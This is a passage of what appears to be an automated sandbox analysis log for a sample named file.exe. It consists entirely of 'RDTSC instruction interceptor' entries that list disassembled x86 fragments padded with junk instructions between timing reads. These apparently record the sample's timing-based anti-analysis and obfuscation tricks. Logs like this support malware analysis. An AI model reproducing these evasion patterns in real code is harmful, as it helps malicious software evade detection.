Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11305E0 second address: 11305FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F330h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1130EB0 second address: 1130EB5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1130EB5 second address: 1130ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F528105F32Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1130ECB second address: 1130F0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F528074EBDBh 0x00000008 jg 00007F528074EBD6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 jc 00007F528074EBDBh 0x00000018 and si, 741Ch 0x0000001d push 00000000h 0x0000001f add esi, dword ptr [ebp+122D39EAh] 0x00000025 push 00000000h 0x00000027 sub edi, dword ptr [ebp+122D1AB6h] 0x0000002d jg 00007F528074EBD8h 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1130F0C second address: 1130F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1130F13 second address: 1130F18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1130F18 second address: 1130F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528105F32Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1130F31 second address: 1130F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1130F36 second address: 1130F3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113175E second address: 113177C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528074EBE9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113177C second address: 1131783 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113391F second address: 1133925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11349F4 second address: 11349F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11349F9 second address: 11349FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1135474 second address: 1135479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1136A35 second address: 1136A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113BAB4 second address: 113BB28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F528105F330h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e add dword ptr [ebp+122D1C58h], edx 0x00000014 push 00000000h 0x00000016 mov edi, 71A760D2h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F528105F328h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 ja 00007F528105F332h 0x0000003d xchg eax, esi 0x0000003e jng 00007F528105F32Eh 0x00000044 jbe 00007F528105F328h 0x0000004a pushad 0x0000004b popad 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jns 00007F528105F326h 0x00000056 push edx 0x00000057 pop edx 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113C91F second address: 113C92B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113E921 second address: 113E92B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F528105F326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113CAC4 second address: 113CAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113E92B second address: 113E935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F528105F326h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113CAC8 second address: 113CACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113E935 second address: 113E939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113CACC second address: 113CADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F528074EBD6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113CC1A second address: 113CC1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113EED8 second address: 113EF2F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F528074EBE0h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push ebx 0x0000000e jp 00007F528074EBD6h 0x00000014 pop ebx 0x00000015 pop ecx 0x00000016 nop 0x00000017 movsx edi, si 0x0000001a push 00000000h 0x0000001c mov bh, 9Eh 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F528074EBD8h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a stc 0x0000003b xchg eax, esi 0x0000003c push ecx 0x0000003d push eax 0x0000003e push edx 0x0000003f jo 00007F528074EBD6h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113EF2F second address: 113EF46 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 js 00007F528105F334h 0x0000000e pushad 0x0000000f jnc 00007F528105F326h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11441CE second address: 11441F9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F528074EBE2h 0x00000008 push ebx 0x00000009 jmp 00007F528074EBE4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11447EA second address: 11447EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11447EF second address: 1144815 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F528074EBDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F528074EBE3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11449E1 second address: 11449EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F528105F326h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1146902 second address: 1146918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F528074EBDCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114AF3E second address: 114AFA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528105F32Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D35AEh], edx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F528105F328h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D1C87h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F528105F328h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e mov ebx, dword ptr [ebp+124544CAh] 0x00000054 xchg eax, esi 0x00000055 push ecx 0x00000056 js 00007F528105F32Ch 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1146A67 second address: 1146A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F528074EBDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1147954 second address: 114795A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114795A second address: 114795E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114BF5B second address: 114BF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1145966 second address: 114596A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114CE86 second address: 114CE8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B1A1 second address: 114B1A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114E01C second address: 114E031 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F528105F328h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114E031 second address: 114E0AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F528074EBD8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jl 00007F528074EBDCh 0x0000002a mov dword ptr [ebp+122D1C82h], eax 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F528074EBD8h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c push esi 0x0000004d mov edi, dword ptr [ebp+122D1ADEh] 0x00000053 pop edi 0x00000054 mov edi, dword ptr [ebp+122D358Ah] 0x0000005a push 00000000h 0x0000005c mov edi, 356CB160h 0x00000061 xchg eax, esi 0x00000062 je 00007F528074EBE4h 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114E0AE second address: 114E0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F528105F326h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114E0BF second address: 114E0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D078 second address: 114D07C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D149 second address: 114D14F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D14F second address: 114D153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D153 second address: 114D16F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F528074EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F528074EBDCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11538D1 second address: 11538D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11538D5 second address: 11538DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E0481 second address: 10E0485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1157E31 second address: 1157E35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1157E35 second address: 1157E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F528105F326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1157E41 second address: 1157E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F528074EBD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1157E4B second address: 1157E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EDC81 second address: 10EDCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F528074EBD6h 0x0000000a popad 0x0000000b jmp 00007F528074EBE7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EDCA3 second address: 10EDCA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EDCA9 second address: 10EDCC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528074EBE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115BDAD second address: 115BDB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115BDB3 second address: 115BDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115BDB7 second address: 115BDDC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F528105F326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jne 00007F528105F32Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 jl 00007F528105F326h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115BDDC second address: 115BDE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F6260 second address: 10F6264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F6264 second address: 10F626F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F626F second address: 10F628F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jp 00007F528105F326h 0x0000000c push eax 0x0000000d pop eax 0x0000000e jnc 00007F528105F326h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push edi 0x0000001a pop edi 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115C58C second address: 115C593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115C72F second address: F7FBDB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F528105F328h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 331F9AB5h 0x00000011 jmp 00007F528105F32Fh 0x00000016 push dword ptr [ebp+122D0961h] 0x0000001c pushad 0x0000001d jo 00007F528105F329h 0x00000023 adc bh, 0000002Dh 0x00000026 popad 0x00000027 call dword ptr [ebp+122D357Ah] 0x0000002d pushad 0x0000002e sub dword ptr [ebp+122D1997h], ecx 0x00000034 xor eax, eax 0x00000036 stc 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jmp 00007F528105F338h 0x00000040 mov dword ptr [ebp+122D3852h], eax 0x00000046 sub dword ptr [ebp+122D1B4Fh], esi 0x0000004c sub dword ptr [ebp+122D1997h], esi 0x00000052 mov esi, 0000003Ch 0x00000057 stc 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c mov dword ptr [ebp+122D1997h], esi 0x00000062 lodsw 0x00000064 cmc 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 pushad 0x0000006a jl 00007F528105F328h 0x00000070 mov ebx, edi 0x00000072 mov si, 6DB2h 0x00000076 popad 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b cld 0x0000007c nop 0x0000007d push eax 0x0000007e push edx 0x0000007f pushad 0x00000080 pushad 0x00000081 popad 0x00000082 js 00007F528105F326h 0x00000088 popad 0x00000089 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116330F second address: 1163313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1163313 second address: 1163319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1163319 second address: 1163329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBDBh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1163329 second address: 116332F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11626B4 second address: 11626BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1162DAC second address: 1162DB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1162DB0 second address: 1162DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F528074EBE7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1162F17 second address: 1162F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F528105F326h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11706A4 second address: 11706B0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F528074EBD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11706B0 second address: 11706FF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F528105F328h 0x00000008 pushad 0x00000009 jng 00007F528105F326h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F528105F337h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e js 00007F528105F326h 0x00000024 pop edi 0x00000025 push ecx 0x00000026 push edx 0x00000027 pop edx 0x00000028 jmp 00007F528105F332h 0x0000002d pop ecx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F3B7 second address: 116F3DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F528074EBDEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F528074EBDEh 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F3DF second address: 116F402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007F528105F326h 0x0000000c popad 0x0000000d jmp 00007F528105F336h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F402 second address: 116F408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F408 second address: 116F40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F40E second address: 116F412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F55C second address: 116F566 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F528105F326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F566 second address: 116F577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007F528074EBD6h 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F6E3 second address: 116F6E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F6E9 second address: 116F6F4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F528074EBD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F6F4 second address: 116F732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F528105F337h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F528105F336h 0x00000015 ja 00007F528105F326h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116F732 second address: 116F73C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F528074EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
